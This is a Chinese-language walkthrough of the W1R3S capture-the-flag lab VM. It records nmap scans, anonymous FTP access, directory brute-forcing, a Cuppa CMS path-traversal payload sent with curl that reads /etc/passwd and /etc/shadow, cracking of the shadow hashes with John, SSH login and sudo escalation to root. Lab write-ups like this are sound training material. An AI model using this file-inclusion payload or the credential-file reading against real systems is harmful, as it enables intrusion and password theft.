W1R3S

  • 下载地址
  • 安装
    • 直接丢到vm中

1、主机发现

sudo nmap -sn 10.200.32.0/24
  • 在靶机开启之前,用Nmap扫描一下
  • 开启后,在进行扫描
   Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:00 CST
│Nmap scan report for 10.200.32.2
│Host is up (0.00017s latency).
│MAC Address: 00:50:56:FB:FF:43 (VMware)
│Nmap scan report for 10.200.32.129
│Host is up (0.000063s latency).
│MAC Address: 00:0C:29:4D:89:EC (VMware)
│Nmap scan report for 10.200.32.254
│Host is up (0.00011s latency).
│MAC Address: 00:50:56:E2:B0:10 (VMware)
│Nmap scan report for 10.200.32.128
│Host is up.
│Nmap done: 256 IP addresses (4 hosts up) scanned in 27.90 seconds
    

2、端口扫描

第一次扫描

sudo nmap --min-rate 10000 -p- 10.200.32.129

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:08 CST
Nmap scan report for 10.200.32.129
Host is up (0.00029s latency).
Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:4D:89:EC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 25.39 seconds
  • 要求全
  • 最少扫两遍,防止网络问题出现波动

第二次扫描

sudo nmap -sT -sV -O -p 21,22,80,3306 10.200.32.129



Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:10 CST
Nmap scan report for 10.200.32.129
Host is up (0.00051s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:4D:89:EC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1
OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9, Linux 5.1
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.11 seconds




sudo nmap -sU -p 21,22,80,3306 10.200.32.129
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:14 CST
Nmap scan report for 10.200.32.129
Host is up (0.00029s latency).

PORT     STATE         SERVICE
21/udp   open|filtered ftp
22/udp   open|filtered ssh
80/udp   open|filtered http
3306/udp closed        mysql
MAC Address: 00:0C:29:4D:89:EC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds
  • -sT 以TCP形式扫描, -sV扫描端口服务的版本, -O 查看扫描系统
  • 用UDP 扫描一下,-sU 以UDP形式扫描一下
  • 端口分析:
    优先级选择:21,80,3306,22
    ftp 简单, 80端口是重点

第三次扫描

使用NMAP的漏洞扫描

sudo nmap --script=vuln -p 21,22,80,3306 10.200.32.129

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|_  /wordpress/wp-login.php: Wordpress login page.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
3306/tcp open  mysql
MAC Address: 00:0C:29:4D:89:EC (VMware)
  • DOS攻击
  • wordpress搭建的东西

每个攻击向量最多不超过20分钟

3、FTP方向

ftp 10.200.32.129

Connected to 10.200.32.129.
220 Welcome to W1R3S.inc FTP service.
Name (10.200.32.129:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
  • 使用匿名登录 anonymous
    ftp> ls
    229 Entering Extended Passive Mode (|||45817|)
    150 Here comes the directory listing.
    drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
    drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
    drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
    226 Directory send OK.
    ftp> cd content
    250 Directory successfully changed.
    ftp> ls
    229 Entering Extended Passive Mode (|||49057|)
    150 Here comes the directory listing.
    -rw-r--r--    1 ftp      ftp            29 Jan 23  2018 01.txt
    -rw-r--r--    1 ftp      ftp           165 Jan 23  2018 02.txt
    -rw-r--r--    1 ftp      ftp           582 Jan 23  2018 03.txt
    226 Directory send OK.
    ftp> mget 0*.txt
    mget 01.txt [anpqy?]? 
    229 Entering Extended Passive Mode (|||42914|)
    150 Opening BINARY mode data connection for 01.txt (29 bytes).
    100% |***********************************************************************************************************************************************************************************************|    29        0.29 KiB/s    00:00 ETA
    226 Transfer complete.
    29 bytes received in 00:00 (0.29 KiB/s)
    mget 02.txt [anpqy?]? 
    229 Entering Extended Passive Mode (|||47040|)
    150 Opening BINARY mode data connection for 02.txt (165 bytes).
    100% |***********************************************************************************************************************************************************************************************|   165        9.09 KiB/s    00:00 ETA
    226 Transfer complete.
    165 bytes received in 00:00 (7.82 KiB/s)
    mget 03.txt [anpqy?]? 
    229 Entering Extended Passive Mode (|||40937|)
    150 Opening BINARY mode data connection for 03.txt (582 bytes).
    100% |***********************************************************************************************************************************************************************************************|   582      458.35 KiB/s    00:00 ETA
    226 Transfer complete.
    582 bytes received in 00:00 (294.94 KiB/s)
    ftp>cd ..
    250 Directory successfully changed.
    ftp> cd docs
    250 Directory successfully changed.
    ftp> ls
    229 Entering Extended Passive Mode (|||45086|)
    150 Here comes the directory listing.
    -rw-r--r--    1 ftp      ftp           138 Jan 23  2018 worktodo.txt
    226 Directory send OK.
    ftp> get worktodo.txt
    local: worktodo.txt remote: worktodo.txt
    229 Entering Extended Passive Mode (|||48274|)
    150 Opening BINARY mode data connection for worktodo.txt (138 bytes).
    100% |***********************************************************************************************************************************************************************************************|   138        8.52 KiB/s    00:00 ETA
    226 Transfer complete.
    138 bytes received in 00:00 (8.14 KiB/s)
    ftp> cd ..
    250 Directory successfully changed.
    ftp> ls
    229 Entering Extended Passive Mode (|||45998|)
    150 Here comes the directory listing.
    drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
    drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
    drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
    226 Directory send OK.
    ftp> cd new-employees
    250 Directory successfully changed.
    ftp> ls
    229 Entering Extended Passive Mode (|||40652|)
    150 Here comes the directory listing.
    -rw-r--r--    1 ftp      ftp           155 Jan 28  2018 employee-names.txt
    226 Directory send OK.
    ftp> get employee-names.txt
    local: employee-names.txt remote: employee-names.txt
    229 Entering Extended Passive Mode (|||48673|)
    150 Opening BINARY mode data connection for employee-names.txt (155 bytes).
    100% |***********************************************************************************************************************************************************************************************|   155        5.12 KiB/s    00:00 ETAz`
    226 Transfer complete.
    155 bytes received in 00:00 (5.00 KiB/s)
    ftp> binary
    200 Switching to Binary mode.
    ftp> quit
  • 最后执行binary 命令防止文件无法读取
  • 发现了五个文件
    1.txt,2.txt,3.txt,employee-names.txt,worktodo.txt

分别查看

- 01.txt
      cat 01.txt   
      New FTP Server For W1R3S.inc
- 02.txt
      #
      #
      #
      #
      #
      #
      #
      #
      01ec2d8fc11c493b25029fb1f47f39ce
      #
      #
      #
      #
      #
      #
      #
      #
      #
      #
      #
      #
      #
      SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
  • 使用hash-indentifier识别加密方式

    (kali㉿kali)-[~]
    └─$ hash-identifier '01ec2d8fc11c493b25029fb1f47f39ce'     
    Possible Hashs:
    [+] MD5
    [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
    

    第一个可能是MD5,去在线网站md5解密
    This is not a password

    • 第二个:
       ──(kali㉿kali)-[~]
       └─$ hash-identifier 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg=='
       Not Found.
      
    • 感觉像base64编码,试一下
      ┌──(kali㉿kali)-[~]
      └─$ echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d 
      It is easy, but not that easy.. 
      

    正确√

  • 03.txt
    └─$ cat 03.txt
    . __ __ ______________________ _________ .
    _
    /| | ____ / \ / / _
    _
    ___ \ / / || ____ ____
    | | | | _/ __ \ \ // / | || / ( < _
    _ \ | |/ _/ \
    | | | Y \ / \ / | || | / / \ | | | \ _
    |
    | || /_ > _/\ / |||| /______ /_______ / /\ ||| /__ >
    / / / / / / / / /

    无意义

  • employee-names.txt
    $ cat employee-names.txt
    The W1R3S.inc employee list

    Naomi.W - Manager
    Hector.A - IT Dept
    Joseph.G - Web Design
    Albert.O - Web Design
    Gina.L - Inventory
    Rico.D - Human Resources
    
  • worktodo.txt
    cat worktodo.txt
    ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

    ....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
    
    • 类似于字符翻转
      web :https://www.upsidedowntext.com/
      ı don’t thınk thıs ıs the way to root!

      we have a ןot of work to do‘ stop pןayıng around˙˙˙˙

4、web方向

  • 查看界面:
    http://10.200.32.129/

  • 在用nmap做端口扫描的时候,我们发现有wordpress这个cms,尝试从这下手

  • 目录爆破
    feroxbuster -u http://10.200.32.129 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

    • 常用工具:gobuster,dirb、feroxbuster
        [####################] - 38s    30000/30000   800/s   http://10.200.32.129/javascript/ 
        [####################] - 29s    30000/30000   1065/s  http://10.200.32.129/wordpress/ 
        [####################] - 32s    30000/30000   953/s   http://10.200.32.129/administrator/ 
        [####################] - 27s    30000/30000   1278/s  http://10.200.32.129/javascript/jquery/ 
        [####################] - 30s    30000/30000   1005/s  http://10.200.32.129/administrator/templates/ 
        [####################] - 0s     30000/30000   0/s     http://10.200.32.129/administrator/media/ => Directory listing (add -e to scan)
        [####################] - 25s    30000/30000   1217/s  http://10.200.32.129/administrator/js/ 
        [####################] - 0s     30000/30000   0/s     http://10.200.32.129/administrator/language/ => Directory listing (add -e to scan)
        [####################] - 32s    30000/30000   933/s   http://10.200.32.129/administrator/components/ 
        [####################] - 26s    30000/30000   1149/s  http://10.200.32.129/administrator/installation/ 
        [####################] - 25s    30000/30000   1186/s  http://10.200.32.129/administrator/classes/ 
        [####################] - 29s    30000/30000   1081/s  http://10.200.32.129/administrator/components/stats/ 
        [####################] - 0s     30000/30000   0/s     http://10.200.32.129/administrator/classes/ajax/ => Directory listing (add -e to scan)
        [####################] - 0s     30000/30000   0/s     http://10.200.32.129/administrator/installation/html/ => Directory listing (add -e to scan)
        [####################] - 25s    30000/30000   1288/s  http://10.200.32.129/wordpress/wp-content/ 
        [####################] - 15s    30000/30000   1896/s  http://10.200.32.129/wordpress/wp-admin/ 
        [####################] - 0s     30000/30000   0/s     http://10.200.32.129/wordpress/wp-includes/ => Directory listing (add -e to scan)
        [####################] - 29s    30000/30000   1049/s  http://10.200.32.129/administrator/templates/default/ 
        [####################] - 0s     30000/30000   0/s     http://10.200.32.129/administrator/js/jquery/ => Directory listing (add -e to scan)
        [####################] - 24s    30000/30000   1533/s  http://10.200.32.129/wordpress/wp-content/plugins/ 
        [####################] - 28s    30000/30000   1113/s  http://10.200.32.129/wordpress/wp-content/themes/ 
        [####################] - 0s     30000/30000   0/s     http://10.200.32.129/administrator/js/tiny_mce/ => Directory listing (add -e to scan)
        [####################] - 0s     30000/30000   0/s     http://10.200.32.129/wordpress/wp-content/uploads/ => Directory listing (add -e to scan)
        [####################] - 19s    30000/30000   1697/s  http://10.200.32.129/administrator/api/ 
        [####################] - 23s    30000/30000   1287/s  http://10.200.32.129/administrator/components/permissions/ ```
      
  • 查看 wordpress
    404

  • 查看 http://10.200.32.129/administrator/installation/

    测试过后,发现不行。但是出了一个新的CMS—cuppa

  • 使用searchsploit 查看是否存在简单漏洞

      searchsploit cuppa cms
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
       Exploit Title                                                                                                                                                                   |  Path
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
      Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion                                                                                                                  | php/webapps/25971.txt
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
      Shellcodes: No Resul

先下载下来
searchsploit -m 25971.txt

有一个简单的漏洞,测试一下。通过多次测试发现可行。playload如下

http://10.200.32.129/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

但是,没有显示任何东西。查看文档发现,可能存在编码或请求不同的问题
尝试用curl试一下

      └─$ sudo curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://10.200.32.129/administrator/alerts/alertConfigField.php | html2text
        % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                       Dload  Upload   Total   Spent    Left  Speed
      100  4414  100  4347  100    67   298k   4706 --:--:-- --:--:-- --:--:--  307k
      Configuration:
      root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
      bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:
      x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin
      man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/
      usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/
      var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/
      nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/
      var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
      list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:
      /var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System
      (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/
      nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time
      Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd
      Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:
      systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:
      105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/
      syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:
      110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:
      108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/
      nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/
      avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-
      daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
      colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
      speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/
      bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
      kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:
      124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:
      RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false
      usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false w1r3s:x:1000:1000:
      w1r3s,,,:/home/w1r3s:/bin/bash sshd:x:121:65534::/var/run/sshd:/usr/sbin/
      nologin ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false mysql:x:123:130:MySQL
      Server,,,:/nonexistent:/bin/false

发现可以
看看能不能拿到shadow(存储用户密码的文件)

   root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
    daemon:*:17379:0:99999:7:::
    bin:*:17379:0:99999:7:::
    sys:*:17379:0:99999:7:::
    sync:*:17379:0:99999:7:::
    games:*:17379:0:99999:7:::
    man:*:17379:0:99999:7:::
    lp:*:17379:0:99999:7:::
    mail:*:17379:0:99999:7:::
    news:*:17379:0:99999:7:::
    uucp:*:17379:0:99999:7:::
    proxy:*:17379:0:99999:7:::
    www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
    backup:*:17379:0:99999:7:::
    list:*:17379:0:99999:7:::
    irc:*:17379:0:99999:7:::
    gnats:*:17379:0:99999:7:::
    nobody:*:17379:0:99999:7:::
    systemd-timesync:*:17379:0:99999:7:::
    systemd-network:*:17379:0:99999:7:::
    systemd-resolve:*:17379:0:99999:7:::
    systemd-bus-proxy:*:17379:0:99999:7:::
    syslog:*:17379:0:99999:7:::
    _apt:*:17379:0:99999:7:::
    messagebus:*:17379:0:99999:7:::
    uuidd:*:17379:0:99999:7:::
    lightdm:*:17379:0:99999:7:::
    whoopsie:*:17379:0:99999:7:::
    avahi-autoipd:*:17379:0:99999:7:::
    avahi:*:17379:0:99999:7:::
    dnsmasq:*:17379:0:99999:7:::
    colord:*:17379:0:99999:7:::
    speech-dispatcher:!:17379:0:99999:7:::
    hplip:*:17379:0:99999:7:::
    kernoops:*:17379:0:99999:7:::
    pulse:*:17379:0:99999:7:::
    rtkit:*:17379:0:99999:7:::
    saned:*:17379:0:99999:7:::
    usbmux:*:17379:0:99999:7:::
    w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
    sshd:*:17554:0:99999:7:::
    ftp:*:17554:0:99999:7:::
    mysql:!:17554:0:99999:7:::

存储下来,并用John破解

           (www-data)     
  Almost done: Processing the remaining buffered candidate passwords, if any.
  Proceeding with wordlist:/usr/share/john/password.lst
  computer         (w1r3s)     

尝试用ssh连接

  sudo ssh [email protected]
  sudo ssh [email protected]
  The authenticity of host '10.200.32.129 (10.200.32.129)' can't be established.
  ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM.
  This key is not known by any other names.
  Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  Warning: Permanently added '10.200.32.129' (ED25519) to the list of known hosts.
  ----------------------
  Think this is the way?
  ----------------------
  Well,........possibly.
  ----------------------
  [email protected]'s password: 
  Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)
  
   * Documentation:  https://help.ubuntu.com
   * Management:     https://landscape.canonical.com
   * Support:        https://ubuntu.com/advantage
  
  102 packages can be updated.
  0 updates are security updates.
  
  New release '18.04.6 LTS' available.
  Run 'do-release-upgrade' to upgrade to it.
  
  .....You made it huh?....
  Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35

5、提权

sudo -l 

    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User w1r3s may run the following commands on W1R3S:
    (ALL : ALL) ALL

发现,我们获得的账户就是root。

w1r3s@W1R3S:~$ sudo -i
sudo: unable to resolve host W1R3S
root@W1R3S:~# ls
flag.txt
root@W1R3S:~# cat flag.txt 
-----------------------------------------------------------------------------------------
   ____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____  
  / ___/ _ \| \ | |/ ___|  _ \    / \|_   _| | | | |      / \|_   _|_ _/ _ \| \ | / ___| 
 | |  | | | |  \| | |  _| |_) |  / _ \ | | | | | | |     / _ \ | |  | | | | |  \| \___ \ 
 | |__| |_| | |\  | |_| |  _ <  / ___ \| | | |_| | |___ / ___ \| |  | | |_| | |\  |___) |
  \____\___/|_| \_|\____|_| \_\/_/   \_\_|  \___/|_____/_/   \_\_| |___\___/|_| \_|____/ 
                                                                                        
-----------------------------------------------------------------------------------------

                          .-----------------TTTT_-----_______
                        /''''''''''(______O] ----------____  \______/]_
     __...---'"""\_ --''   Q                               ___________@
 |'''                   ._   _______________=---------"""""""
 |                ..--''|   l L |_l   |
 |          ..--''      .  /-___j '   '
 |    ..--''           /  ,       '   '
 |--''                /           `    \
                      L__'         \    -
                                    -    '-.
                                     '.    /
                                       '-./

----------------------------------------------------------------------------------------
  YOU HAVE COMPLETED THE
               __      __  ______________________   _________
              /  \    /  \/_   \______   \_____  \ /   _____/
              \   \/\/   / |   ||       _/ _(__  < \_____  \ 
               \        /  |   ||    |   \/       \/        \
                \__/\  /   |___||____|_  /______  /_______  /.INC
                     \/                \/       \/        \/        CHALLENGE, V 1.0
----------------------------------------------------------------------------------------

CREATED BY SpecterWires

-----------------

你可能感兴趣的:(靶机,linux,web安全,网络安全,安全)